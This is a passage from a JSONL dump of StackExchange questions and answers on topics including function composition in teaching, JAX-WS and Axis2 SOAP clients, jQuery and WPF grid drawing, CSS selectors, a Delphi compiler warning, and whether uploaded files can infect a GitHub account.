I'd suspect not all students are ready for such subtleties, but there are some advantages:\n\nThis is how it works in mathematics, but even more importantly, in programming. There, functions are usually statically typed, meaning that you specify the type of their input and output. If you try to compose two functions: $$ f \\colon \\mathbb{N} \\to \\mathbb{R}, \\ f(n)=\\sqrt{n} \n\\quad \\text{with} \\quad \ng \\colon \\mathbb{N} \\to \\mathbb{N}, \\ g(x)=x^2, $$\nin a typical programming language, you should expect an error when trying to compute $g(f(4))$, even though the reason in somewhat artificial (at least from the mathematical perspective).\nThe distinction can clear up some confusion in your example 1. If $f(x) = x^2$ and $g(x) = \\sqrt{x-1}$, then actually we deal with functions $g \\colon [1,\\infty) \\to \\mathbb{R}$ and $f \\colon \\mathbb{R} \\to \\mathbb{R}$, and their composition is by definition $f \\circ g \\colon [1,\\infty) \\to \\mathbb{R}$, $(f \\circ g)(x) = f(g(x)) = x-1$. Of course, given the expression $x-1$ out of context, we would ascribe $\\mathbb{R}$ as its natural domain. Avoiding unnecessary subtleties, one could also summarize it as follows: the natural domain of the composition $f \\circ g$ may be larger than the natural domain of $g$.\n\nI hope it also sheds some light on how you could explain points 2 and 3.\nComment: @JanakaRodrigo I really cannot answer, as there are at least two ways to interpret the words \"you can\" (in principle, I can substitute anything anywhere, the problem is in interpreting the result). If $f(g(x))$ is your shortcut for the function composition $f \\circ g$, then **no**, as explained in the answer. If $f(g(x))$ stand for the expression obtained by substituting one expression into another (which is basically a composition, but treated algebraically), then possibly **yes** (if only the resulting expression makes sense for such $x$).\nComment: @StevenGubkin Can you elaborate? I don't know what monads are or what DNE means, but I'd be interested in knowing what you had in mind. Maybe you can write it as a separate answer?\nComment: I don't feel like writing up an answer but I am using \"DNE\" for \"Does not exist\" (or \"error\"). You can basically adjoin a single element \"DNE\" to every set. Then functions which map DNE to DNE correspond to partial functions. Check out https:\/\/ncatlab.org\/nlab\/show\/maybe+monad.\nComment: It's also worth pointing out that in a lot of mathematics we pretend to be using one of the above definitions for function and function composition, but in reality we're just playing silly buggers and doing whatever we feel like, assuming the reader is smart enough to provide the necessary definitions themself. In such a way that the results match a sensible interpretation.\nComment: Do you mean when f(x) and g(x) are given as expressions without mentioning domains, you can substitute any value for x in f(g(x)) ?\nComment: One can also use the \"maybe monad\" type approach to partial functions. This is essentially equivalent to joining \"DNE\" to each codomain. Then define composition to send always send a \"DNE\" to \"DNE\".\nComment: @Micha\u0142Mi\u015bkiewicz do you need to interchange $B$ and $B'$ in 15th line of your answer?\nComment: @JanakaRodrigo I think it's OK the way it is. This is the situation where e.g. 
$f(x)=x+2$, $g(x)=\\frac{1}{x}$ (with their natural domains) and $g \\circ f$ only defined on a subset of the domain of $f$.\nComment: @Micha\u0142Mi\u015bkiewicz do you mean either way is ok or the way you have mentioned only. What about when you interchange $x+2$ and $1\/x$ in your example?\nComment: I don't understand exactly what is the alternative way. Do you mean the case when $f \\colon A \\to B$, $g \\colon B' \\to C$ and additionally $B \\subseteq B'$? I didn't mention it, but in this case there's no ambiguity in defining the composition, and if one is pedantic again, one should define it as the composition $g \\circ i \\circ f$, where $i \\colon B \\to B'$ is simply the inclusion.\nAnswer: I initially found requiring the range of $g$ being a subset of the domain of $f$ to be the more appealing option, but having thought about it more, I now think that any two real functions should be composable. This is based on two principles:\n\nThe key takeaway skill from talking about domains is that students should be able to recognize when an expression exists or doesn't exist for various $x$. There shouldn't be extra rules for dealing with functions for students to memorize. As such:\nFunctions should not behave differently from ordinary algebra: students can write algebraic expressions that don't exist for any $x$, so they should also be able to write $f(g(x))$ when it doesn't make sense for any $x$.\n\nOf course, the most important principle is to agree with whatever your textbook says, so that students don't get confused when they reference it.\nComment: This is pretty much the minimal understanding of functions I expect students to have in the US when enrolling in calculus in college. Whether it is the understanding I wish they had is another matter: you teach the students you get. For instance, in calculus, I usually have to explain $(\\sqrt x)^2$ has a restricted domain. I don't know whether in other countries students usually obtain a more rigorous understanding of functions. Of course in the US, there is variation in level of rigor, level of proficiency, and with the holes in their backgrounds.\nComment: I suggest just as to find expression for f(g(x)) you don't have to think about whether the range of g is a subset of domain of f or not but what about when you refer the function f(g(x) .I think here considering that condition may be important.\nComment: Could you clarify what you mean by \"but\" in the first sentence? If you compose two functions $f,g:\\mathbb{R} \\to \\mathbb{R}$, then you're in the situation described in the first part of the sentence: the range of $g$ is a subset of $\\mathbb{R}$, which is in turn the domain of $f$.\nComment: Whoops! I mean partial functions. I was specifically trying to avoid talking about functions that have inputs\/outputs other than real numbers.\nComment: @JochenGlueck as you agree function f(g(x) exists, what about the value of f(g(0)) because 0 is not in the domain of g but you can find f(g(0)) by substituting 0 for the expression f(g(x)) that is x -1. These kind of questions asked in high school grade 10 .\nComment: @Raciquel , the way we do it our curriculum is by introducing domain whenever it is not given in real value functions. There we need to take a set of real numbers which when substituted for $x $give real values as outputs . 
According to that convention domain of $f$ is \u211d and domain of $g$ is set of real numbers not less than 1.\nAnswer: I think the answer by Michal Mi\u015bkiewicz does an excellent job addressing issues, and captures the formal mathematical perspective.\nThe distinction between the formality of \"function with domain\" and the more laissez-faire perspective of \"expressions\" is an important pedagogical issue. When I teach composition in precalculus and come to this issue, I like to refer to the \"function with domain\" as a rule typically given by an algebraic expression along with a demon who prevents evaluation at values not in the domain. This is akin to Maxwell's demon, the proverbial gatekeeper of the Second Law of Thermodynamics.\n\nSome of my more artistic students enjoy drawing their creative renditions of gatekeepers of functions domains. Often the characteristics of the demon reflect the name of the function--\"square root\" inspires some to draw a demon holding a mandrake with square roots. Having students draw domain demons so I can share them with the class seems to help students retain the idea that functions have domains. When I grade exams, I sometimes see more sketches that students draw in the margins.\nWhen the demon goes to sleep, the function becomes an expression and that's when we can play fast and loose. When the demon for $(f(x)=x^2,\\ x\\in {\\bf R})$ goes to sleep, we can square all sorts of things such as matrices, mandrake roots, etc.\nComment: @JanakaRodrigo We use the \"implied\" domain for each expression. We have $\\left(f(x),{\\bf R}\\right)$, $\\left(g(x),\\{x\\in{\\bf R}, x\\ne -1\\}\\right)$, $\\left( h(x)=\\frac{8}{x-1},\\ x\\in{\\bf R}, x\\ne1\\}\\right)$. The gremlin for $f$ has an easy job, and gets paid for doing nothing. \n\nThe gremlin for $g$ gets paid to watch for $x=-1$ and shoot it out of the air whenever it tries to sneak into $g$. The gremlins for $g$ and $h$ are mirror twins.\nComment: When domains or the functions terms are not mentioned we can just treat $f(g(x)) $as expression, but what about when those terms are used in the question. How could you explain the following issue which I got from review exercise in high school grade 10. If $f(x)= x-2 $and $g(x) = 8\/(x +1) $find $g(f(x)) $and state the domain ? In this question domain of$ f $and $g$ not given.\nComment: As a conclusion can we say if domains given of the functions $f $and $g $such that range of $g $is not a subset of domain of $f$ , composite function$ fog(x) $can not be defined but if domains not given we can define those in order to exist the composite function.\n","meta":{"source":"matheducators.stackexchange","title":"Composite functions","dup_signals":{}},"subset":"stackexchange"} +{"text":"Web service (JAX-WS) client in different package\n\nQuestion: Should look like a stupid question, but I have the following problem.\nThere's an external web service, WSDL is available. My task is to call it's methods from another enterprise application (running on WebSphere 8.5)\nUsing Rational Application Developer, I generated Web service client classes into the application's project, specifying the application's package, which DIFFERS from the web service's one. 
Web service's method returns a POJO, which is a wrapper for ArrayList.Then I make a call to web service, using generated calsses in the following way:\n<code>package com.mycompany.services.external;\n\nimport com.mycompany.services.external.client.SomeCommonService;\nimport com.mycompany.services.external.client.SomeCommonServiceService;\nimport com.mycompany.services.external.client.IdsList;\n\n final QName COMMONSERVICE_QNAME = new QName(\"http:\/\/webService.othercompany.com\/\", \"SomeCommonServiceService\");\n\n String strUrl = \"http:\/\/....\";\n String query = \"\/universal [@Barcode=\\\"000111\\\"]\";\n\n URL serviceUrl = new URL(strUrl);\n SomeCommonServiceService service=new SomeCommonServiceService(serviceUrl, COMMONSERVICE_QNAME);\n SomeCommonService port = service.getSomeCommonServicePort();\n IdsList itemsIds = port.getItemsIdsByQuery(query);\n<\/code>\nAnd as a result the last line of code, where the method is invoked, causes an error: \n\n[1\/17\/17 21:55:39:758 MSK] 00000497 SystemErr R CIWEB Error:\n [admin(unknown) @ 10.253.32.24]\n com.ibm.ecm.util.PluginUtil.invokeService()\n javax.xml.ws.WebServiceException: javax.xml.bind.JAXBException:\n com.mycompany.services.external.client.IdsList is not known to this\n context\n\nTaking a look into the generated package-info.java the following mapping can be seen:\n<code>@javax.xml.bind.annotation.XmlSchema(namespace = \"http:\/\/webService.othercompany.com\/\")\npackage com.mycompany.services.external.client;\n<\/code>\nIf I leave original option (not changing default package) while generating client - the same problem and the same error. But in this case, if I pack generated client into a separate JAR and use it as a shared library for my application on WebSphere server - then all works fine! But that's not acceptable for some reasons.\nCould somebody be so pleasant to hepl me solve the problem?\nAnswer: I used to work with Web Services Base on WSDL:\nExample: http:\/\/www.dgii.gov.do\/wsMovilDGII\/WSMovilDGII.asmx?wsdl\nOf course using MAVEN, I use this pluging\n<code><plugins>\n <plugin>\n <groupId>org.apache.cxf<\/groupId>\n <artifactId>cxf-codegen-plugin<\/artifactId>\n <version>3.1.5<\/version>\n <executions>\n <execution>\n <id>generate-sources<\/id>\n <phase>generate-sources<\/phase>\n <configuration>\n <sourceRoot>${basedir}\/src\/main\/java\/<\/sourceRoot>\n <wsdlOptions>\n <wsdlOption>\n <wsdl>http:\/\/www.dgii.gov.do\/wsMovilDGII\/WSMovilDGII.asmx?wsdl<\/wsdl>\n <packagenames>\n <packagename>com.hectorvent.consultadgii<\/packagename>\n <\/packagenames>\n <\/wsdlOption>\n <\/wsdlOptions>\n <\/configuration>\n <goals>\n <goal>wsdl2java<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n<\/code>\n","meta":{"source":"stackoverflow","title":"Web service (JAX-WS) client in different package","dup_signals":{}},"subset":"stackexchange"} +{"text":"Color 2 cells width and 3 cells height when clinking on a TD element\n\nQuestion: I'm looking for a way to make a grid (for now using Table, but soon in div).\nLet's sais I click on the first cell (x,y = 1,-1) I want the background color to change for 2 cells width and 3 cells height. (Total of 6 cells changed)...\nIf it's easier to do it using div, go ahead... using jQuery please! :)\nI really don't know how to do this and if someone can put me on the path or give me a code that should do it... 
or better, a tutorial XD...\nI really appreciate your help, 100 times thanks\nEDIT:\nWhat i'm trying to do actually here is an invisible grod make a system comparable to rts-like games, where the building is transparent and follow the mouse but it's attached to the grid when you move, and on clikc the bulding is droped (no transparency)... Explaining this just so you can have a little visual here.\nComment: What do you want then, table or divs. Both require substantially different approaches...\nComment: Div if preferable since table is deprecated.. :)\nAnswer: The following is for div (as it's the long term goal):\nFirstly, I made a little markup that will be like a sort of table.\nThe html is:\n<code><div id=\"overall\">\n <div class=\"row\">\n <div class=\"cell col0\"><\/div><div class=\"cell col1\"><\/div><div class=\"cell col2\"><\/div><div class=\"cell col3\"><\/div> \n <\/div>\n <div class=\"row\">\n <div class=\"cell col0\"><\/div><div class=\"cell col1\"><\/div><div class=\"cell col2\"><\/div><div class=\"cell col3\"><\/div>\n <\/div>\n <div class=\"row\">\n <div class=\"cell col0\"><\/div><div class=\"cell col1\"><\/div><div class=\"cell col2\"><\/div><div class=\"cell col3\"><\/div> \n <\/div>\n <div class=\"row\">\n <div class=\"cell col0\"><\/div><div class=\"cell col1\"><\/div><div class=\"cell col2\"><\/div><div class=\"cell col3\"><\/div> \n <\/div> \n<\/div>\n<\/code>\nWith the following css:\n<code>.row{\n height:25px;\n}\n.cell{\n width:25px;\n height:100%;\n display:inline-block;\n border:1px solid black;\n}\n<\/code>\nSo it has a table like display (it's a bunch of row composed of cells, cells in a same column share a class).\nTo do what you want, it looks like you'll need to associate a click function to each <code>.cell<\/code>.\nTo do so is easy, using <code>$(\".cell\").click(function(){});<\/code>\nNow, it's time to complete the function.\nNow the next step is coloring the cell you'll need to color. To add the coloration we'll use a special class (this way we can change more things easily):\n<code>.clickedCell{\n background:red;\n}\n<\/code>\nThe hardest part is to select the 6 cells. Numerous way can be used (for example we could have a grid of id like A1, A2, B1, B2 and select them using id) and the efficiency\/design depends heavily on the markup you'll have for your divs. \nThe way I'd do that is the following:\n\nRetrieving the class of the column of my cell : \n<code>var cl=$(this).attr(\"class\");\nvar col=\".\"+\/col\\d\/.exec(cl)[0];\n<\/code>\nRetrieving the parent of current div <code>var parent=$(this).parent();<\/code>\nMaking a jQuery object containing the 3 cells in the current colomn:\n<code>listOfCell=$(this);\nlistOfCell=listOfCell.add(parent.next().children(col));\nlistOfCell=listOfCell.add(parent.prev().children(col));\n<\/code>\nNote that the add function returns a new collection, thus we need to assign the return value.\nAdding the 3 next cells to that object <code>listOfCell=listOfCell.add(listOfCell.next());<\/code>\nAdding the class <code>listOfCell.addClass(\"clickedCell\");<\/code>\n\nAnd it's over :)\nA working example here: http:\/\/jsfiddle.net\/KZFzd\/1\/\nNote that:\n\nAs said before, the function depends heavily on the markup used.\nThe example does not handle the deletion of previously selected cells. It's easy and left as an exercise to the reader.\nIt does not handle the special case of the cells on the side, it just change the background of the cell that would be changed if the grid was greater. 
This case is left as an exercise to the reader.\nIt does not check the existence of next\/previous parents because jQuery returns an empty jQuery object when nothing matches, and therefore, methods can be called on it, even if it has no effects.\nThe example can be compacted in many ways, but is left as is for readability purposes.\n\nHope that helps.\nEDIT:\nIn order to answer to your comment, the new fiddle to handle a specified size: http:\/\/jsfiddle.net\/KZFzd\/3\/\nI added two input that let you specify the size. You'll probably need to change that in your code <code>:)<\/code>.\nI also added the class removal to clean the display.\nSo the two main change are that now, we're using two <code>for<\/code> loops to add cells. And the clicked cell is the top left corner of the rectangle.\n\nthe first one:\n<code>for (i=1;i<y;i++){\n listOfCell=listOfCell.add(par.children(col));\n par=par.next();\n}\n<\/code>\nIt's just iterating from one parent to another to reach the desired height. (and the first parent assignation is now the next one directly. <code>par=$(this).parent().next()<\/code>\nthe second one:\n<code>for (i=1;i<x;i++){\n listOfCell=listOfCell.add(listOfCell.next());\n}\n<\/code>\nIt's just iterating to add the next elements to reach the desired width.\n\nNote that:\n\nWe're using the fact that there are no double in a jQuery list in the width.\nWe're iterating starting from 1 and not 0, because our starting <code>listOfCell<\/code> is already a 1*1 cell\nYou can easily start from others corner if you change the use of <code>next()<\/code> to <code>prev()<\/code> in one loop or\/and the other.\nIt still does not handle the side cases.\nComment: Wow Py, I like you so much! It's amazing!... But I just notify, is it possible to make the width and height using variable? So we can choose 4x4 or 2x6 or 1x2 ? The objective is to be able to color cell only once using different patern, don't know if it's possible and if your up to help, even if you already helped alot. Thanks for your answer again!!\nComment: Yeah i think it's doable, i'll post a new fiddle a soon as possible.\n","meta":{"source":"stackoverflow","title":"Color 2 cells width and 3 cells height when clinking on a TD element","dup_signals":{}},"subset":"stackexchange"} +{"text":"Infecting files on GitHub\n\nQuestion: Suppose one uploads (carelessly or purposefully) a file with a malicious payload to their Github account (some pdf document, picture, etc.). Could this payload somehow be executed on the Github servers (through preview or alike) and corrupt (infect) any other good files stored there (the years of important work one would like to keep)? And would it be safe to delete the suspicious file and move on with the rest of the data in the github account? A non-technical person might be tempted to wipe everything and start clean, but that would be overkill, right?\nComment: This would be the same as your email attachment question if your focus is solely on the Github server side. And like your other question, it's the syncing of the files locally that is the problem. Github doesn't \"execute\" the files one uploads.\nAnswer: You seem not to understand how computers works in general, what operating systems are, what they do, and what the HTTP server is.\nThe simple act of uploading or downloading anything to or from the Internet does not entail any code execution. You're basically moving bytes from one storage to another one. These bytes are not automatically executed unless you instruct them to, e.g. 
by launching a downloaded exe or creating a script which processes them.\n","meta":{"source":"security.stackexchange","title":"Infecting files on GitHub","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I use a badge from angular material design doc?\n\nQuestion: I found a badge on this page. I want to have a digit (I assume, the text \"2)) within this nice circle (I'd like to set up a color as well or use some default one): like the very top example from that page.\nThey say, the code should be:\n<code><mat-icon matBadge=\"22\" matBadgePosition=\"above after\">home<\/mat-icon>\n<\/code>\nBut <code><div><mat-icon matBadge=\"22\" matBadgePosition=\"above after\">home<\/mat-icon><\/div><\/code> doesn't work. I believe I should wrap it inside <code><md-content><\/code> and stuff like that, is it a good idea?\nIn my project I wrap anything inside <code><div><md-menu><md-button><\/code>, but right here I can't see this kind of tags.\nComment: You're looking at the wrong documentation site.\nAnswer: You seem to be mixing up AngularJS Material with Angular Material.\nUnfortunately, there's no such feature for a badge if you're using AngularJS 1.x Material.\nAnswer: You can use angular-material-badge, which works with AngularJS.\n","meta":{"source":"stackoverflow","title":"How can I use a badge from angular material design doc?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Simple css override\n\nQuestion: I have the following css:\n<code>.wrapper {\n display: inline-block;\n margin-top: 60px;\n padding: 15px;\n width: 100%;\n}\n<\/code>\nI want to create another class which inherit all <code>wrapper<\/code> properties and overrides the <code>width<\/code> property:\n<code>.wrapper .extended {\n width: 150% !important;\n}\n<\/code>\nAnd tried to use that in my HTML like:\n<code><section class=\"wrapper extended\"> \n<\/code>\nBut unfortunately that doesn't work.\nHow can I correct my code ?\nComment: lol, remove the space between your classes\nComment: you are going for the child's, concatenate that.\nAnswer: They are two classes of same element. Remove the space:\n<code>.wrapper.extended {\n width: 150% !important;\n}\n<\/code>\nGiving <code>.wrapper .extended<\/code> means, you are selecting a child <code>.extended<\/code> under <code>.wrapper<\/code>. Giving <code>.wrapper.extended<\/code> is you are selecting an element with both <code>.wrapper<\/code> and <code>.extended<\/code> classes. Hope it is clear.\nComment: @PraveenKumar you explain well !!\nAnswer: Remove space between <code>.wrapper<\/code> <code>.extended<\/code> class\n<code>.wrapper.extended {\n width: 150% !important;\n}\n<\/code>\ncss selectors\nAnswer: You can't add a space between these 2 classes. <code>.wrapper .extended<\/code>\nIt will be considered as it's child element, but it is not. 
Use this\n<code>.wrapper.extended {\n width: 150% !important;\n}\n<\/code>\nAnswer: Remove space between <code>.wrapper<\/code> <code>.extended<\/code> class\nPlease add this method <code>.wrapper.extended<\/code> \nAnd css like this:\n<code>.wrapper.extended {\n width: 150% !important;\n}\n<\/code>\nHope it is clear.\n","meta":{"source":"stackoverflow","title":"Simple css override","dup_signals":{}},"subset":"stackexchange"} +{"text":"W1035 Return value of function 'Test' might be undefined unexpectedly appears after adding a try-finally block\n\nQuestion: I have an unexpected W1035 on compiling:\n\n[dcc32 Warning] Unit1.pas(40): W1035 Return value of function 'Test'\nmight be undefined\n\n<code>function CheckFn() : Boolean;\nbegin\n Result := True;\nend;\n\nfunction Test() : Boolean;\nbegin\n try\n if(not CheckFn()) then\n raise Exception.Create('Error Message');\n\n Result := True;\n finally\n\n end;\nend;\n<\/code>\nIf I remove the <code>try-finally<\/code> block, then the warning disappears.\n<code>function Test() : Boolean;\nbegin\n if(not CheckFn()) then\n raise Exception.Create('Error Message');\n\n Result := True;\nend;\n<\/code>\nWhy is this happening? (Bug?)\nComment: Similar problem with an exception raised in `try-finally` block: `var Tmp : Integer; begin try raise Exception.Create('Invalid value!'); finally end; ShowMessage(IntToStr(Tmp)); end;`. It raises a warning on compiling _W1036 Variable 'Tmp' might not have been initialized_\nAnswer: Let's analyse <code>Test<\/code>.\n\nIf <code>CheckFn<\/code> raises an exception, you immediately go to the <code>finally<\/code> clause, and then you leave the function without returning a value.\nOtherwise, if <code>CheckFn<\/code> returns <code>True<\/code>, you will return <code>True<\/code> from the function.\nOtherwise, if <code>CheckFn<\/code> returns <code>False<\/code>, you will raise an exception and immediately go to the <code>finally<\/code> clause and then you leave the function without returning a value.\n\nHence, in all cases when this function does return a value, it is defined (specifically, it is <code>True<\/code>). Therefore, the compiler is wrong to emit this warning.\nAnd, indeed, in Delphi 10.4, no warning is produced for this code.\n(Or, just possibly, did you confuse <code>finally<\/code> with <code>except<\/code>? If so, the compiler is right.)\nComment: No, I didn't confused, it's really a `finally`\nComment: Then it's a bug in the compiler!\nComment: I'm glad to hear that it has been already fixed in newer IDEs. I'll add an useless initialization with a todo-comment for removing it as soon as I will upgrade my IDE\nComment: FWIW the fix for this particular issue happened somewhen during the 10.2.x version (10.1.2 gives the bogus W1035, 10.2.3 does not)\n","meta":{"source":"stackoverflow","title":"W1035 Return value of function 'Test' might be undefined unexpectedly appears after adding a try-finally block","dup_signals":{}},"subset":"stackexchange"} +{"text":"Axis2 problem in setting SOAPAction HTTP header\n\nQuestion: I am trying co connect to a 3'rd party SOAP web service. It seems that the service can work when the HTTP SOAPAction header is an empty String (\"\"). 
This is the snippet of the wsdl:\n<code><wsdl:binding name=\"detailsRequestMessage\" type=\"tns:UssdPortType\">\n <soap:binding style=\"document\" transport=\"http:\/\/schemas.xmlsoap.org\/soap\/http\"\/>\n <wsdl:operation name=\"details\">\n <soap:operation soapAction=\"\"\/>\n <wsdl:input>\n <soap:body use=\"literal\"\/>\n <\/wsdl:input>\n <wsdl:output>\n <soap:body use=\"literal\"\/>\n <\/wsdl:output>\n <\/wsdl:operation>\n<\/wsdl:binding>\n<\/code>\nWhere you see the soapAction=\"\"\nI generated a stubusing the Axis2 (1.5) wsdl2java.\nI was hoping to get the following (the successful output when running with SoapUI):\n<code>POST \/details HTTP\/1.1\nAccept-Encoding: gzip,deflate\nContent-Type: text\/xml;charset=UTF-8\nSOAPAction: \"\"\nUser-Agent: Jakarta Commons-HttpClient\/3.1\nHost: some.host\nContent-Length: 323\n<\/code>\nBut instead I am getting:\n<code>POST \/details HTTP\/1.1\nContent-Type: text\/xml; charset=UTF-8\nSOAPAction: \"http:\/\/some.url\/wsussd\/ussdtypes\/UssdPortType\/detailsRequest\"\nUser-Agent: Axis2\nHost: some.host\nContent-Length: 300\n<\/code>\nDoes anyone has any idea what is the problem or how do I set the soapAction in the program.\nThanks,\nRonen\nAnswer: rperez wasn't entirely clear with his answer.\nI have found https:\/\/issues.apache.org\/jira\/browse\/AXIS2-4264 which claims the issue was fixed in 1.6.0, but I still have problems in 1.6.2\nHowever, this does work:\n<code>stub._getServiceClient().getOptions().setProperty(org.apache.axis2.Constants.Configuration.DISABLE_SOAP_ACTION, true);\n<\/code>\nAnswer: Have a look at the answer to this question...you may be able to find similar code in your generated stubs.\nIf that's the case, then I think you can set the action (according to the API):\n<code>serviceClient = new RPCServiceClient();\nOptions options = serviceClient.getOptions();\noptions.setAction(\"\");\n<\/code>\nI think the action is handled differently depending on the SOAP version. To specify a different version:\n<code>options.setSoapVersionURI(\n org.apache.axiom.soap.SOAP11Constants.SOAP_ENVELOPE_NAMESPACE_URI);\n<\/code>\n(or the SOAP12 version of the constant).\nHope that helps.\nComment: I tried that with no luck.\nthe thing that did it was to set the properties of the option .\nThanks\n","meta":{"source":"stackoverflow","title":"Axis2 problem in setting SOAPAction HTTP header","dup_signals":{}},"subset":"stackexchange"} +{"text":"Add Bulk Notes to Contacts\n\nQuestion: I have about 200 contacts that I need to add a bulk note to. I can add bulk activities using CiviRules, but I can't find a way to add a bulk note.\nDoes anyone have any ideas or know of an extension that would do this?\nAnswer: You can do this by creating a profile with a note field, Update multiple contacts from Actions in search results and then copying the note to each contact with the little copy button beside the Note heading (this is assuming you're trying to add the same note to each contact).\nAnswer: Contact import can do this. You just need to first export a list of their contact ids, then add a column with your note.\nOn the import screen choose Update for duplicates (the rule is irrelevant - can leave blank). 
On the mapping screen choose ContactID and Note.\n","meta":{"source":"civicrm.stackexchange","title":"Add Bulk Notes to Contacts","dup_signals":{}},"subset":"stackexchange"} +{"text":"What's the optimum way to draw high number of dots?\n\nQuestion: We are building a graphical application, we need to draw dots on the canvas background, as we have a feature like Snap To Grid\nOf course, user can set the distance between snapping dots, so, if we have a canvas of size 1024 x 1024, with 5 pixels between each dot, we will have around 41775 dot! \nWhat's the recommended way to render this high number of dots on the canvas ? we need it to be as fast as possible.\nAnswer: WPF doesn't have a direct method to draw pixels on a Canvas. The optimal way to implement it would be with Image and a WriteableBitmap source. Take a look at the code below. It has two functions: drawGrid1 and drawGrid2. On my machine, the first function (draws Ellipse element) takes 6 seconds. The latter function takes 50 milliseconds.\nThe code below is just for illustration. You could cache the WritebaleBitmap, and you should be sensitive (if your scenario requires) changes in the width or height (or, just create a very big bitmap). If you need even more performance, and you are OK with unsafe code, you can call WritebaleBitmap.Lock, then get WriteableBitmap.BackBuffer, and modify the back buffer manually. At the end, call WriteableBitmap.AddDirtyBuffer to invalidate the entire rectangle. It is also possible that if your Grid has only two colors, you can achieve even more performance, by using a palette.\nMore about WriteableBitmap: http:\/\/msdn.microsoft.com\/en-us\/library\/system.windows.media.imaging.writeablebitmap(VS.85).aspx\nXAML:\n<code><Window\n x:Class=\"SO.MainWindow\"\n xmlns=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation\"\n xmlns:x=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\"\n Height=\"1000\" Width=\"1000\"\n Title=\"SO Sample\"\n Loaded=\"Window_Loaded\"\n >\n <Canvas x:Name=\"x_canvas\">\n <Border Canvas.Left=\"4\" Canvas.Right=\"4\" Width=\"120\" Height=\"32\" Background=\"White\" >\n <TextBlock x:Name=\"x_txt\" VerticalAlignment=\"Center\" \/>\n <\/Border>\n <\/Canvas>\n<\/Window>\n<\/code>\nCode Behind:\n<code>private void Window_Loaded( object sender, RoutedEventArgs e ) {\n DateTime start = DateTime.Now;\n \/\/drawGrid1( );\n drawGrid2( );\n DateTime end = DateTime.Now;\n TimeSpan span = end - start;\n x_txt.Text = span.ToString( );\n}\n\nprivate void drawGrid2( ) {\n \/\/ Create a new image\n Image img = new Image( ); \n RenderOptions.SetBitmapScalingMode( img, BitmapScalingMode.NearestNeighbor );\n RenderOptions.SetEdgeMode( img, EdgeMode.Aliased );\n\n \/\/ Add this image to the canvas\n x_canvas.Children.Add( img );\n int width = (int)x_canvas.ActualWidth;\n int height = (int)x_canvas.ActualHeight;\n\n \/\/ Create the bitmap, and set\n WriteableBitmap wb = new WriteableBitmap(\n width,\n height,\n 96, 96,\n PixelFormats.Bgra32,\n null \n );\n\n img.Source = wb;\n img.Stretch = Stretch.None;\n img.HorizontalAlignment = HorizontalAlignment.Left;\n img.VerticalAlignment = VerticalAlignment.Top;\n Canvas.SetZIndex( img, -100 );\n\n \/\/ Each \"dot\" is 2x2 rectangle\n Int32Rect rect = new Int32Rect( 0, 0, 2, 2 );\n int size = rect.Width * rect.Height * 4;\n byte[] pixels = new byte[ size ];\n\n \/\/ Setup the pixel array\n for( int i=0; i<rect.Height*rect.Width; ++i ) {\n pixels[ i*4 + 0 ] = 255; \/\/ Blue\n pixels[ i*4 + 1 ] = 0; \/\/ Green\n pixels[ i*4 + 2 ] = 0; \/\/ Red\n 
pixels[ i*4 + 3 ] = 255; \/\/ Alpha\n }\n\n wb.WritePixels( rect, pixels, rect.Width*4, 0 );\n\n int step = 5;\n for( int r = 0; r<height; r+=step ) {\n for( int c = 0; c<width; c+=step ) {\n rect.X = c;\n rect.Y = r;\n wb.WritePixels( rect, pixels, rect.Width*4, 0 );\n }\n }\n}\n\nprivate void drawGrid1( ) {\n int step = 10;\n for( int i=0; i<1024; i+=step ) {\n for( int j=0; j<1024; j+=step ) {\n Ellipse l = new Ellipse( );\n if( i%100==0 && j%100==0 ) {\n l.Width = 4;\n l.Height = 4;\n }\n else {\n l.Width = 2;\n l.Height = 2;\n }\n l.Fill = new SolidColorBrush( Colors.Black );\n Canvas.SetTop( l, i );\n Canvas.SetLeft( l, j );\n Canvas.SetZIndex( l, -100 );\n this.x_canvas.Children.Add( l );\n }\n }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"What's the optimum way to draw high number of dots?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using a method from inherited class through base class\n\nQuestion: So I couldn't exactly find an answer anywhere.\nI have an entity class from which I create all my characters in the game. eg: Player inherits Entity.\nNow what I want to do, is call the \"Update\" method in Player from the entity class. Is this possible? Because I need to do this for every new entity type I create now:\n<code> foreach (Entity entity in entityList) {\n if (entity is Zombie) {\n Zombie zombie = (Zombie)entity;\n zombie.Update();\n }\n \/\/new character here\n }\n<\/code>\nThanks in advance!\nComment: Right, sorry about that.\nAnswer: If the concept of \"update\" applies to all entities, you could make <code>Update<\/code> a virtual function of <code>Entity<\/code> and let <code>Player<\/code> override it. Then, inside member functions of <code>Entity<\/code> you would just have to invoke <code>Update()<\/code> on the particular <code>Entity<\/code> object and let the call be dispatched dynamically:\n<code>foreach (Entity entity in entityList) { entity.Update(); }\n<\/code>\nIf <code>Update()<\/code> does not make sense for all <code>Entity<\/code>s, then having them as a virtual function of <code>Entity<\/code> would pollute the interface of that class, and it seems to me that your choice is correct. \nYou may also consider using the Visitor Pattern if you want to avoid the dynamic downcasts.\nAnswer: Override the <code>Update()<\/code> method in your subclasses. Then, just call <code>entity.Update()<\/code> for any encountered entity. This is what's called polymorphism.\n","meta":{"source":"stackoverflow","title":"Using a method from inherited class through base class","dup_signals":{}},"subset":"stackexchange"} +{"text":"How\/Which directory to install a 3rd party C++ library on Ubuntu?\n\nQuestion: I'm just beginning to learn more about Linux as I'm using Ubuntu.\nI'm trying to install a header-only library called \"date.h\" from here\nAn excerpt from the github states that this is a header-only library\n\n\"date.h\" is a header-only library which builds upon <chrono>. It adds some new duration types, and new time_point types. It also adds \"field\" types such as year_month_day which is a struct {year, month, day}. 
